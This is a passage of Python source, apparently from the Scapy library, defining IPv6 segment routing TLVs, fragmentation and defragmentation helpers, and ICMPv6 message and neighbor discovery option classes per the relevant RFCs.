1008 # draft-ietf-6man-segment-routing-header-06 3.1.1
1009 fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs),
1010 ByteField("len", 18),
1011 ByteField("reserved", 0),
1012 ByteField("flags", 0),
1013 IP6Field("ingress_node", "::1")]
1014
1015
1016class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
1017 name = "IPv6 Option Header Segment Routing - Egress Node TLV"
1018 # draft-ietf-6man-segment-routing-header-06 3.1.2
1019 fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs),
1020 ByteField("len", 18),
1021 ByteField("reserved", 0),
1022 ByteField("flags", 0),
1023 IP6Field("egress_node", "::1")]
1024
1025
1026class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV):
1027 name = "IPv6 Option Header Segment Routing - Pad1 TLV"
1028 # RFC8754 sect 2.1.1.1
1029 fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs),
1030 FieldLenField("len", None, length_of="padding", fmt="B"),
1031 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501
1032
1033
1034class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV):
1035 name = "IPv6 Option Header Segment Routing - PadN TLV"
1036 # RFC8754 sect 2.1.1.2
1037 fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs),
1038 FieldLenField("len", None, length_of="padding", fmt="B"),
1039 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501
1040
1041
1042class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV):
1043 name = "IPv6 Option Header Segment Routing - HMAC TLV"
1044 # RFC8754 sect 2.1.2
1045 fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs),
1046 FieldLenField("len", None, length_of="hmac",
1047 adjust=lambda _, x: x + 48),
1048 BitField("D", 0, 1),
1049 BitField("reserved", 0, 15),
1050 IntField("hmackeyid", 0),
1051 StrLenField("hmac", "",
1052 length_from=lambda pkt: pkt.len - 48)]
1053
1054
1055class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
1056 name = "IPv6 Option Header Segment Routing"
1057 # RFC8754 sect 2. + flag bits from draft 06
1058 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
1059 ByteField("len", None),
1060 ByteField("type", 4),
1061 ByteField("segleft", None),
1062 ByteField("lastentry", None),
1063 BitField("unused1", 0, 1),
1064 BitField("protected", 0, 1),
1065 BitField("oam", 0, 1),
1066 BitField("alert", 0, 1),
1067 BitField("hmac", 0, 1),
1068 BitField("unused2", 0, 3),
1069 ShortField("tag", 0),
1070 IP6ListField("addresses", ["::1"],
1071 count_from=lambda pkt: (pkt.lastentry + 1)),
1072 PacketListField("tlv_objects", [],
1073 IPv6ExtHdrSegmentRoutingTLV,
1074 length_from=lambda pkt: 8 * pkt.len - 16 * (
1075 pkt.lastentry + 1
1076 ))]
1077
1078 overload_fields = {IPv6: {"nh": 43}}
1079
1080 def post_build(self, pkt, pay):
1081
1082 if self.len is None:
1083
1084 # The extension must be align on 8 bytes
1085 tmp_mod = (-len(pkt) + 8) % 8
1086 if tmp_mod == 1:
1087 tlv = IPv6ExtHdrSegmentRoutingTLVPad1()
1088 pkt += raw(tlv)
1089 elif tmp_mod >= 2:
1090 # Add the padding extension
1091 tmp_pad = b"\x00" * (tmp_mod - 2)
1092 tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad)
1093 pkt += raw(tlv)
1094
1095 tmp_len = (len(pkt) - 8) // 8
1096 pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:]
1097
1098 if self.segleft is None:
1099 tmp_len = len(self.addresses)
1100 if tmp_len:
1101 tmp_len -= 1
1102 pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]
1103
1104 if self.lastentry is None:
1105 lastentry = len(self.addresses)
1106 if lastentry == 0:
1107 warning(
1108 "IPv6ExtHdrSegmentRouting(): the addresses list is empty!"
1109 )
1110 else:
1111 lastentry -= 1
1112 pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:]
1113
1114 return _IPv6ExtHdr.post_build(self, pkt, pay)
1115
1116
1117# Fragmentation Header #
1118
1119class IPv6ExtHdrFragment(_IPv6ExtHdr):
1120 name = "IPv6 Extension Header - Fragmentation header"
1121 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
1122 BitField("res1", 0, 8),
1123 BitField("offset", 0, 13),
1124 BitField("res2", 0, 2),
1125 BitField("m", 0, 1),
1126 IntField("id", None)]
1127 overload_fields = {IPv6: {"nh": 44}}
1128
1129 def guess_payload_class(self, p):
1130 if self.offset > 0:
1131 return Raw
1132 else:
1133 return super(IPv6ExtHdrFragment, self).guess_payload_class(p)
1134
1135
1136def defragment6(packets):
1137 """
1138 Performs defragmentation of a list of IPv6 packets. Packets are reordered.
1139 Crap is dropped. What lacks is completed by 'X' characters.
1140 """
1141
1142 # Remove non fragments
1143 lst = [x for x in packets if IPv6ExtHdrFragment in x]
1144 if not lst:
1145 return []
1146
1147 id = lst[0][IPv6ExtHdrFragment].id
1148
1149 llen = len(lst)
1150 lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id]
1151 if len(lst) != llen:
1152 warning("defragment6: some fragmented packets have been removed from list") # noqa: E501
1153
1154 # reorder fragments
1155 res = []
1156 while lst:
1157 min_pos = 0
1158 min_offset = lst[0][IPv6ExtHdrFragment].offset
1159 for p in lst:
1160 cur_offset = p[IPv6ExtHdrFragment].offset
1161 if cur_offset < min_offset:
1162 min_pos = 0
1163 min_offset = cur_offset
1164 res.append(lst[min_pos])
1165 del lst[min_pos]
1166
1167 # regenerate the fragmentable part
1168 fragmentable = b""
1169 for p in res:
1170 q = p[IPv6ExtHdrFragment]
1171 offset = 8 * q.offset
1172 if offset != len(fragmentable):
1173 warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501
1174 fragmentable += b"X" * (offset - len(fragmentable))
1175 fragmentable += raw(q.payload)
1176
1177 # Regenerate the unfragmentable part.
1178 q = res[0].copy()
1179 nh = q[IPv6ExtHdrFragment].nh
1180 q[IPv6ExtHdrFragment].underlayer.nh = nh
1181 q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable)
1182 del q[IPv6ExtHdrFragment].underlayer.payload
1183 q /= conf.raw_layer(load=fragmentable)
1184 del q.plen
1185
1186 if q[IPv6].underlayer:
1187 q[IPv6] = IPv6(raw(q[IPv6]))
1188 else:
1189 q = IPv6(raw(q))
1190 return q
1191
1192
1193def fragment6(pkt, fragSize):
1194 """
1195 Performs fragmentation of an IPv6 packet. 'fragSize' argument is the
1196 expected maximum size of fragment data (MTU). The list of packets is
1197 returned.
1198
1199 If packet does not contain an IPv6ExtHdrFragment class, it is added to
1200 first IPv6 layer found. If no IPv6 layer exists packet is returned in
1201 result list unmodified.
1202 """
1203
1204 pkt = pkt.copy()
1205
1206 if IPv6ExtHdrFragment not in pkt:
1207 if IPv6 not in pkt:
1208 return [pkt]
1209
1210 layer3 = pkt[IPv6]
1211 data = layer3.payload
1212 frag = IPv6ExtHdrFragment(nh=layer3.nh)
1213
1214 layer3.remove_payload()
1215 del layer3.nh
1216 del layer3.plen
1217
1218 frag.add_payload(data)
1219 layer3.add_payload(frag)
1220
1221 # If the payload is bigger than 65535, a Jumbo payload must be used, as
1222 # an IPv6 packet can't be bigger than 65535 bytes.
1223 if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
1224 warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") # noqa: E501
1225 return []
1226
1227 s = raw(pkt) # for instantiation to get upper layer checksum right
1228
1229 if len(s) <= fragSize:
1230 return [pkt]
1231
1232 # Fragmentable part : fake IPv6 for Fragmentable part length computation
1233 fragPart = pkt[IPv6ExtHdrFragment].payload
1234 tmp = raw(IPv6(src="::1", dst="::1") / fragPart)
1235 fragPartLen = len(tmp) - 40 # basic IPv6 header length
1236 fragPartStr = s[-fragPartLen:]
1237
1238 # Grab Next Header for use in Fragment Header
1239 nh = pkt[IPv6ExtHdrFragment].nh
1240
1241 # Keep fragment header
1242 fragHeader = pkt[IPv6ExtHdrFragment]
1243 del fragHeader.payload # detach payload
1244
1245 # Unfragmentable Part
1246 unfragPartLen = len(s) - fragPartLen - 8
1247 unfragPart = pkt
1248 del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload
1249
1250 # Cut the fragmentable part to fit fragSize. Inner fragments have
1251 # a length that is an integer multiple of 8 octets. last Frag MTU
1252 # can be anything below MTU
1253 lastFragSize = fragSize - unfragPartLen - 8
1254 innerFragSize = lastFragSize - (lastFragSize % 8)
1255
1256 if lastFragSize <= 0 or innerFragSize == 0:
1257 warning("Provided fragment size value is too low. " +
1258 "Should be more than %d" % (unfragPartLen + 8))
1259 return [unfragPart / fragHeader / fragPart]
1260
1261 remain = fragPartStr
1262 res = []
1263 fragOffset = 0 # offset, incremeted during creation
1264 fragId = random.randint(0, 0xffffffff) # random id ...
1265 if fragHeader.id is not None: # ... except id provided by user
1266 fragId = fragHeader.id
1267 fragHeader.m = 1
1268 fragHeader.id = fragId
1269 fragHeader.nh = nh
1270
1271 # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
1272 while True:
1273 if (len(remain) > lastFragSize):
1274 tmp = remain[:innerFragSize]
1275 remain = remain[innerFragSize:]
1276 fragHeader.offset = fragOffset # update offset
1277 fragOffset += (innerFragSize // 8) # compute new one
1278 if IPv6 in unfragPart:
1279 unfragPart[IPv6].plen = None
1280 tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp)
1281 res.append(tempo)
1282 else:
1283 fragHeader.offset = fragOffset # update offSet
1284 fragHeader.m = 0
1285 if IPv6 in unfragPart:
1286 unfragPart[IPv6].plen = None
1287 tempo = unfragPart / fragHeader / conf.raw_layer(load=remain)
1288 res.append(tempo)
1289 break
1290 return res
1291
1292
1293#############################################################################
1294#############################################################################
1295# ICMPv6* Classes #
1296#############################################################################
1297#############################################################################
1298
1299
1300icmp6typescls = {1: "ICMPv6DestUnreach",
1301 2: "ICMPv6PacketTooBig",
1302 3: "ICMPv6TimeExceeded",
1303 4: "ICMPv6ParamProblem",
1304 128: "ICMPv6EchoRequest",
1305 129: "ICMPv6EchoReply",
1306 130: "ICMPv6MLQuery", # MLDv1 or MLDv2
1307 131: "ICMPv6MLReport",
1308 132: "ICMPv6MLDone",
1309 133: "ICMPv6ND_RS",
1310 134: "ICMPv6ND_RA",
1311 135: "ICMPv6ND_NS",
1312 136: "ICMPv6ND_NA",
1313 137: "ICMPv6ND_Redirect",
1314 # 138: Do Me - RFC 2894 - Seems painful
1315 139: "ICMPv6NIQuery",
1316 140: "ICMPv6NIReply",
1317 141: "ICMPv6ND_INDSol",
1318 142: "ICMPv6ND_INDAdv",
1319 143: "ICMPv6MLReport2",
1320 144: "ICMPv6HAADRequest",
1321 145: "ICMPv6HAADReply",
1322 146: "ICMPv6MPSol",
1323 147: "ICMPv6MPAdv",
1324 # 148: Do Me - SEND related - RFC 3971
1325 # 149: Do Me - SEND related - RFC 3971
1326 151: "ICMPv6MRD_Advertisement",
1327 152: "ICMPv6MRD_Solicitation",
1328 153: "ICMPv6MRD_Termination",
1329 # 154: Do Me - FMIPv6 Messages - RFC 5568
1330 155: "ICMPv6RPL", # RFC 6550
1331 }
1332
1333icmp6typesminhdrlen = {1: 8,
1334 2: 8,
1335 3: 8,
1336 4: 8,
1337 128: 8,
1338 129: 8,
1339 130: 24,
1340 131: 24,
1341 132: 24,
1342 133: 8,
1343 134: 16,
1344 135: 24,
1345 136: 24,
1346 137: 40,
1347 # 139:
1348 # 140
1349 141: 8,
1350 142: 8,
1351 143: 8,
1352 144: 8,
1353 145: 8,
1354 146: 8,
1355 147: 8,
1356 151: 8,
1357 152: 4,
1358 153: 4,
1359 155: 4
1360 }
1361
1362icmp6types = {1: "Destination unreachable",
1363 2: "Packet too big",
1364 3: "Time exceeded",
1365 4: "Parameter problem",
1366 100: "Private Experimentation",
1367 101: "Private Experimentation",
1368 128: "Echo Request",
1369 129: "Echo Reply",
1370 130: "MLD Query",
1371 131: "MLD Report",
1372 132: "MLD Done",
1373 133: "Router Solicitation",
1374 134: "Router Advertisement",
1375 135: "Neighbor Solicitation",
1376 136: "Neighbor Advertisement",
1377 137: "Redirect Message",
1378 138: "Router Renumbering",
1379 139: "ICMP Node Information Query",
1380 140: "ICMP Node Information Response",
1381 141: "Inverse Neighbor Discovery Solicitation Message",
1382 142: "Inverse Neighbor Discovery Advertisement Message",
1383 143: "MLD Report Version 2",
1384 144: "Home Agent Address Discovery Request Message",
1385 145: "Home Agent Address Discovery Reply Message",
1386 146: "Mobile Prefix Solicitation",
1387 147: "Mobile Prefix Advertisement",
1388 148: "Certification Path Solicitation",
1389 149: "Certification Path Advertisement",
1390 151: "Multicast Router Advertisement",
1391 152: "Multicast Router Solicitation",
1392 153: "Multicast Router Termination",
1393 155: "RPL Control Message",
1394 200: "Private Experimentation",
1395 201: "Private Experimentation"}
1396
1397
1398class _ICMPv6(Packet):
1399 name = "ICMPv6 dummy class"
1400 overload_fields = {IPv6: {"nh": 58}}
1401
1402 def post_build(self, p, pay):
1403 p += pay
1404 if self.cksum is None:
1405 chksum = in6_chksum(58, self.underlayer, p)
1406 p = p[:2] + struct.pack("!H", chksum) + p[4:]
1407 return p
1408
1409 def hashret(self):
1410 return self.payload.hashret()
1411
1412 def answers(self, other):
1413 # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
1414 if (isinstance(self.underlayer, IPerror6) or
1415 isinstance(self.underlayer, _IPv6ExtHdr) and
1416 isinstance(other, _ICMPv6)):
1417 if not ((self.type == other.type) and
1418 (self.code == other.code)):
1419 return 0
1420 return 1
1421 return 0
1422
1423
1424class _ICMPv6Error(_ICMPv6):
1425 name = "ICMPv6 errors dummy class"
1426
1427 def guess_payload_class(self, p):
1428 return IPerror6
1429
1430
1431class ICMPv6Unknown(_ICMPv6):
1432 name = "Scapy6 ICMPv6 fallback class"
1433 fields_desc = [ByteEnumField("type", 1, icmp6types),
1434 ByteField("code", 0),
1435 XShortField("cksum", None),
1436 StrField("msgbody", "")]
1437
1438
1439# RFC 2460 #
1440
1441class ICMPv6DestUnreach(_ICMPv6Error):
1442 name = "ICMPv6 Destination Unreachable"
1443 fields_desc = [ByteEnumField("type", 1, icmp6types),
1444 ByteEnumField("code", 0, {0: "No route to destination",
1445 1: "Communication with destination administratively prohibited", # noqa: E501
1446 2: "Beyond scope of source address", # noqa: E501
1447 3: "Address unreachable",
1448 4: "Port unreachable"}),
1449 XShortField("cksum", None),
1450 ByteField("length", 0),
1451 X3BytesField("unused", 0),
1452 _ICMPExtensionPadField(),
1453 _ICMPExtensionField()]
1454 post_dissection = _ICMP_extpad_post_dissection
1455
1456
1457class ICMPv6PacketTooBig(_ICMPv6Error):
1458 name = "ICMPv6 Packet Too Big"
1459 fields_desc = [ByteEnumField("type", 2, icmp6types),
1460 ByteField("code", 0),
1461 XShortField("cksum", None),
1462 IntField("mtu", 1280)]
1463
1464
1465class ICMPv6TimeExceeded(_ICMPv6Error):
1466 name = "ICMPv6 Time Exceeded"
1467 fields_desc = [ByteEnumField("type", 3, icmp6types),
1468 ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501
1469 1: "fragment reassembly time exceeded"}), # noqa: E501
1470 XShortField("cksum", None),
1471 ByteField("length", 0),
1472 X3BytesField("unused", 0),
1473 _ICMPExtensionPadField(),
1474 _ICMPExtensionField()]
1475 post_dissection = _ICMP_extpad_post_dissection
1476
1477
1478# The default pointer value is set to the next header field of
1479# the encapsulated IPv6 packet
1480
1481
1482class ICMPv6ParamProblem(_ICMPv6Error):
1483 name = "ICMPv6 Parameter Problem"
1484 fields_desc = [ByteEnumField("type", 4, icmp6types),
1485 ByteEnumField(
1486 "code", 0,
1487 {0: "erroneous header field encountered",
1488 1: "unrecognized Next Header type encountered",
1489 2: "unrecognized IPv6 option encountered",
1490 3: "first fragment has incomplete header chain"}),
1491 XShortField("cksum", None),
1492 IntField("ptr", 6)]
1493
1494
1495class ICMPv6EchoRequest(_ICMPv6):
1496 name = "ICMPv6 Echo Request"
1497 fields_desc = [ByteEnumField("type", 128, icmp6types),
1498 ByteField("code", 0),
1499 XShortField("cksum", None),
1500 XShortField("id", 0),
1501 XShortField("seq", 0),
1502 StrField("data", "")]
1503
1504 def mysummary(self):
1505 return self.sprintf("%name% (id: %id% seq: %seq%)")
1506
1507 def hashret(self):
1508 return struct.pack("HH", self.id, self.seq) + self.payload.hashret()
1509
1510
1511class ICMPv6EchoReply(ICMPv6EchoRequest):
1512 name = "ICMPv6 Echo Reply"
1513 type = 129
1514
1515 def answers(self, other):
1516 # We could match data content between request and reply.
1517 return (isinstance(other, ICMPv6EchoRequest) and
1518 self.id == other.id and self.seq == other.seq and
1519 self.data == other.data)
1520
1521
1522# ICMPv6 Multicast Listener Discovery (RFC2710) #
1523
1524# tous les messages MLD sont emis avec une adresse source lien-locale
1525# -> Y veiller dans le post_build si aucune n'est specifiee
1526# La valeur de Hop-Limit doit etre de 1
1527# "and an IPv6 Router Alert option in a Hop-by-Hop Options
1528# header. (The router alert option is necessary to cause routers to
1529# examine MLD messages sent to multicast addresses in which the router
1530# itself has no interest"
1531class _ICMPv6ML(_ICMPv6):
1532 fields_desc = [ByteEnumField("type", 130, icmp6types),
1533 ByteField("code", 0),
1534 XShortField("cksum", None),
1535 ShortField("mrd", 0),
1536 ShortField("reserved", 0),
1537 IP6Field("mladdr", "::")]
1538
1539# general queries are sent to the link-scope all-nodes multicast
1540# address ff02::1, with a multicast address field of 0 and a MRD of
1541# [Query Response Interval]
1542# Default value for mladdr is set to 0 for a General Query, and
1543# overloaded by the user for a Multicast Address specific query
1544# TODO : See what we can do to automatically include a Router Alert
1545# Option in a Destination Option Header.
1546
1547
1548class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
1549 name = "MLD - Multicast Listener Query"
1550 type = 130
1551 mrd = 10000 # 10s for mrd
1552 mladdr = "::"
1553 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1554
1555
1556# TODO : See what we can do to automatically include a Router Alert
1557# Option in a Destination Option Header.
1558class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
1559 name = "MLD - Multicast Listener Report"
1560 type = 131
1561 overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
1562
1563 def answers(self, query):
1564 """Check the query type"""
1565 return ICMPv6MLQuery in query
1566
1567# When a node ceases to listen to a multicast address on an interface,
1568# it SHOULD send a single Done message to the link-scope all-routers
1569# multicast address (FF02::2), carrying in its multicast address field
1570# the address to which it is ceasing to listen
1571# TODO : See what we can do to automatically include a Router Alert
1572# Option in a Destination Option Header.
1573
1574
1575class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
1576 name = "MLD - Multicast Listener Done"
1577 type = 132
1578 overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}}
1579
1580
1581# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) #
1582
1583class ICMPv6MLQuery2(_ICMPv6): # RFC 3810
1584 name = "MLDv2 - Multicast Listener Query"
1585 fields_desc = [ByteEnumField("type", 130, icmp6types),
1586 ByteField("code", 0),
1587 XShortField("cksum", None),
1588 ShortField("mrd", 10000),
1589 ShortField("reserved", 0),
1590 IP6Field("mladdr", "::"),
1591 BitField("Resv", 0, 4),
1592 BitField("S", 0, 1),
1593 BitField("QRV", 0, 3),
1594 ByteField("QQIC", 0),
1595 ShortField("sources_number", None),
1596 IP6ListField("sources", [],
1597 count_from=lambda pkt: pkt.sources_number)]
1598
1599 # RFC8810 - 4. Message Formats
1600 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1601
1602 def post_build(self, packet, payload):
1603 """Compute the 'sources_number' field when needed"""
1604 if self.sources_number is None:
1605 srcnum = struct.pack("!H", len(self.sources))
1606 packet = packet[:26] + srcnum + packet[28:]
1607 return _ICMPv6.post_build(self, packet, payload)
1608
1609
1610class ICMPv6MLDMultAddrRec(Packet):
1611 name = "ICMPv6 MLDv2 - Multicast Address Record"
1612 fields_desc = [ByteField("rtype", 4),
1613 FieldLenField("auxdata_len", None,
1614 length_of="auxdata",
1615 fmt="B"),
1616 FieldLenField("sources_number", None,
1617 length_of="sources",
1618 adjust=lambda p, num: num // 16),
1619 IP6Field("dst", "::"),
1620 IP6ListField("sources", [],
1621 length_from=lambda p: 16 * p.sources_number),
1622 StrLenField("auxdata", "",
1623 length_from=lambda p: p.auxdata_len)]
1624
1625 def default_payload_class(self, packet):
1626 """Multicast Address Record followed by another one"""
1627 return self.__class__
1628
1629
1630class ICMPv6MLReport2(_ICMPv6): # RFC 3810
1631 name = "MLDv2 - Multicast Listener Report"
1632 fields_desc = [ByteEnumField("type", 143, icmp6types),
1633 ByteField("res", 0),
1634 XShortField("cksum", None),
1635 ShortField("reserved", 0),
1636 ShortField("records_number", None),
1637 PacketListField("records", [],
1638 ICMPv6MLDMultAddrRec,
1639 count_from=lambda p: p.records_number)]
1640
1641 # RFC8810 - 4. Message Formats
1642 overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}}
1643
1644 def post_build(self, packet, payload):
1645 """Compute the 'records_number' field when needed"""
1646 if self.records_number is None:
1647 recnum = struct.pack("!H", len(self.records))
1648 packet = packet[:6] + recnum + packet[8:]
1649 return _ICMPv6.post_build(self, packet, payload)
1650
1651 def answers(self, query):
1652 """Check the query type"""
1653 return isinstance(query, ICMPv6MLQuery2)
1654
1655
1656# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) #
1657
1658# TODO:
1659# - 04/09/06 troglocan : find a way to automatically add a router alert
1660# option for all MRD packets. This could be done in a specific
1661# way when IPv6 is the under layer with some specific keyword
1662# like 'exthdr'. This would allow to keep compatibility with
1663# providing IPv6 fields to be overloaded in fields_desc.
1664#
1665# At the moment, if user inserts an IPv6 Router alert option
1666# none of the IPv6 default values of IPv6 layer will be set.
1667
1668class ICMPv6MRD_Advertisement(_ICMPv6):
1669 name = "ICMPv6 Multicast Router Discovery Advertisement"
1670 fields_desc = [ByteEnumField("type", 151, icmp6types),
1671 ByteField("advinter", 20),
1672 XShortField("cksum", None),
1673 ShortField("queryint", 0),
1674 ShortField("robustness", 0)]
1675 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
1676 # IPv6 Router Alert requires manual inclusion
1677
1678 def extract_padding(self, s):
1679 return s[:8], s[8:]
1680
1681
1682class ICMPv6MRD_Solicitation(_ICMPv6):
1683 name = "ICMPv6 Multicast Router Discovery Solicitation"
1684 fields_desc = [ByteEnumField("type", 152, icmp6types),
1685 ByteField("res", 0),
1686 XShortField("cksum", None)]
1687 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
1688 # IPv6 Router Alert requires manual inclusion
1689
1690 def extract_padding(self, s):
1691 return s[:4], s[4:]
1692
1693
1694class ICMPv6MRD_Termination(_ICMPv6):
1695 name = "ICMPv6 Multicast Router Discovery Termination"
1696 fields_desc = [ByteEnumField("type", 153, icmp6types),
1697 ByteField("res", 0),
1698 XShortField("cksum", None)]
1699 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}}
1700 # IPv6 Router Alert requires manual inclusion
1701
1702 def extract_padding(self, s):
1703 return s[:4], s[4:]
1704
1705
1706# ICMPv6 Neighbor Discovery (RFC 2461) #
1707
1708icmp6ndopts = {1: "Source Link-Layer Address",
1709 2: "Target Link-Layer Address",
1710 3: "Prefix Information",
1711 4: "Redirected Header",
1712 5: "MTU",
1713 6: "NBMA Shortcut Limit Option", # RFC2491
1714 7: "Advertisement Interval Option",
1715 8: "Home Agent Information Option",
1716 9: "Source Address List",
1717 10: "Target Address List",
1718 11: "CGA Option", # RFC 3971
1719 12: "RSA Signature Option", # RFC 3971
1720 13: "Timestamp Option", # RFC 3971
1721 14: "Nonce option", # RFC 3971
1722 15: "Trust Anchor Option", # RFC 3971
1723 16: "Certificate Option", # RFC 3971
1724 17: "IP Address Option", # RFC 4068
1725 18: "New Router Prefix Information Option", # RFC 4068
1726 19: "Link-layer Address Option", # RFC 4068
1727 20: "Neighbor Advertisement Acknowledgement Option",
1728 21: "CARD Request Option", # RFC 4065/4066/4067
1729 22: "CARD Reply Option", # RFC 4065/4066/4067
1730 23: "MAP Option", # RFC 4140
1731 24: "Route Information Option", # RFC 4191
1732 25: "Recursive DNS Server Option",
1733 26: "IPv6 Router Advertisement Flags Option"
1734 }
1735
1736icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr",
1737 2: "ICMPv6NDOptDstLLAddr",
1738 3: "ICMPv6NDOptPrefixInfo",
1739 4: "ICMPv6NDOptRedirectedHdr",
1740 5: "ICMPv6NDOptMTU",
1741 6: "ICMPv6NDOptShortcutLimit",
1742 7: "ICMPv6NDOptAdvInterval",
1743 8: "ICMPv6NDOptHAInfo",
1744 9: "ICMPv6NDOptSrcAddrList",
1745 10: "ICMPv6NDOptTgtAddrList",
1746 # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
1747 # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
1748 # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
1749 # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
1750 # 15: Do Me,
1751 # 16: Do Me,
1752 17: "ICMPv6NDOptIPAddr",
1753 18: "ICMPv6NDOptNewRtrPrefix",
1754 19: "ICMPv6NDOptLLA",
1755 # 18: Do Me,
1756 # 19: Do Me,
1757 # 20: Do Me,
1758 # 21: Do Me,
1759 # 22: Do Me,
1760 23: "ICMPv6NDOptMAP",
1761 24: "ICMPv6NDOptRouteInfo",
1762 25: "ICMPv6NDOptRDNSS",
1763 26: "ICMPv6NDOptEFA",
1764 31: "ICMPv6NDOptDNSSL",
1765 37: "ICMPv6NDOptCaptivePortal",
1766 38: "ICMPv6NDOptPREF64",
1767 }
1768
1769icmp6ndraprefs = {0: "Medium (default)",
1770 1: "High",
1771 2: "Reserved",
1772 3: "Low"} # RFC 4191
1773
1774
1775class _ICMPv6NDGuessPayload:
1776 name = "Dummy ND class that implements guess_payload_class()"
1777
1778 def guess_payload_class(self, p):
1779 if len(p) > 1:
1780 return icmp6ndoptscls.get(orb(p[0]), ICMPv6NDOptUnknown)
1781
1782
1783# Beginning of ICMPv6 Neighbor Discovery Options.
1784
1785class ICMPv6NDOptDataField(StrLenField):
1786 __slots__ = ["strip_zeros"]
1787
1788 def __init__(self, name, default, strip_zeros=False, **kwargs):
1789 super().__init__(name, default, **kwargs)
1790 self.strip_zeros = strip_zeros
1791
1792 def i2len(self, pkt, x):
1793 return len(self.i2m(pkt, x))
1794
1795 def i2m(self, pkt, x):
1796 r = (len(x) + 2) % 8
1797 if r:
1798 x += b"\x00" * (8 - r)
1799 return x
1800
1801 def m2i(self, pkt, x):
1802 if self.strip_zeros:
1803 x = x.rstrip(b"\x00")
1804 return x
1805
1806
1807class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
1808 name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
1809 fields_desc = [ByteField("type", 0),
1810 FieldLenField("len", None, length_of="data", fmt="B",
1811 adjust=lambda pkt, x: (2 + x) // 8),
1812 ICMPv6NDOptDataField("data", "", strip_zeros=False,
1813 length_from=lambda pkt:
1814 8 * max(pkt.len, 1) - 2)]
1815
1816# NOTE: len includes type and len field. Expressed in unit of 8 bytes
1817# TODO: Revoir le coup du ETHER_ANY
1818
1819
1820class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
1821 name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
1822 fields_desc = [ByteField("type", 1),
1823 ByteField("len", 1),
1824 MACField("lladdr", ETHER_ANY)]
1825
1826 def mysummary(self):
1827 return self.sprintf("%name% %lladdr%")
1828
1829
1830class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
1831 name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
1832 type = 2
1833
1834
1835class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
1836 name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
1837 fields_desc = [ByteField("type", 3),
1838 ByteField("len", 4),
1839 ByteField("prefixlen", 64),
1840 BitField("L", 1, 1),
1841 BitField("A", 1, 1),
1842 BitField("R", 0, 1),
1843 BitField("res1", 0, 5),
1844 XIntField("validlifetime", 0xffffffff),
1845 XIntField("preferredlifetime", 0xffffffff),
1846 XIntField("res2", 0x00000000),
1847 IP6Field("prefix", "::")]
1848
1849 def mysummary(self):
1850 return self.sprintf("%name% %prefix%/%prefixlen% "
1851 "On-link %L% Autonomous Address %A% "
1852 "Router Address %R%")
1853
1854# TODO: We should also limit the size of included packet to something
1855# like (initiallen - 40 - 2)
1856
1857
1858class TruncPktLenField(PacketLenField):
1859 def i2m(self, pkt, x):
1860 s = bytes(x)
1861 tmp_len = len(s)
1862 return s[:tmp_len - (tmp_len % 8)]
1863
1864 def i2len(self, pkt, i):
1865 return len(self.i2m(pkt, i))
1866
1867
1868class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
1869 name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
1870 fields_desc = [ByteField("type", 4),
1871 FieldLenField("len", None, length_of="pkt", fmt="B",
1872 adjust=lambda pkt, x: (x + 8) // 8),
